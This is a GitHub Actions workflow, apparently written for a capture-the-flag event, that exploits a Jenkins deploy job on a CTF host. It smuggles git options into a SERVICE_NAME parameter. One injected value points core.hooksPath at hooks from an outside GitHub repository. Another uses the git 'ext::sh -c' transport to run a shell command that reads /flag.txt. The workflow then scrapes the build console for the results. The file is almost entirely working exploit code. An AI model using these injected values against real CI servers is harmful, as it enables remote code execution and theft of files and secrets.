name: CTF Final Exploit
on:
  push:
    branches: [ master ]
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Exploit hooksPath
        run: |
          PAYLOAD='--config core.hooksPath=hooks.git https://github.com/chilectf/exploit'
          curl -sk -X POST 'https://gitops.ctfchile.com/job/deploy-service/buildWithParameters' --data-urlencode "SERVICE_NAME=$PAYLOAD" -D - | tail -5
          sleep 8
          PAGE=$(curl -sk https://gitops.ctfchile.com/job/deploy-service)
          LATEST=$(echo "$PAGE" | grep -oP '/job/deploy-service/\K\d+(?=/console)' | sort -n | tail -1)
          echo "Latest build: #$LATEST"
          curl -sk "https://gitops.ctfchile.com/job/deploy-service/$LATEST/console"
      - name: Exploit ext protocol
        run: |
          curl -sk -X POST 'https://gitops.ctfchile.com/job/deploy-service/buildWithParameters' --data-urlencode "SERVICE_NAME=ext::sh -c cat /flag.txt >&2" -D - | tail -5
          sleep 8
          PAGE=$(curl -sk https://gitops.ctfchile.com/job/deploy-service)
          LATEST=$(echo "$PAGE" | grep -oP '/job/deploy-service/\K\d+(?=/console)' | sort -n | tail -1)
          echo "Latest build: #$LATEST"
          curl -sk "https://gitops.ctfchile.com/job/deploy-service/$LATEST/console"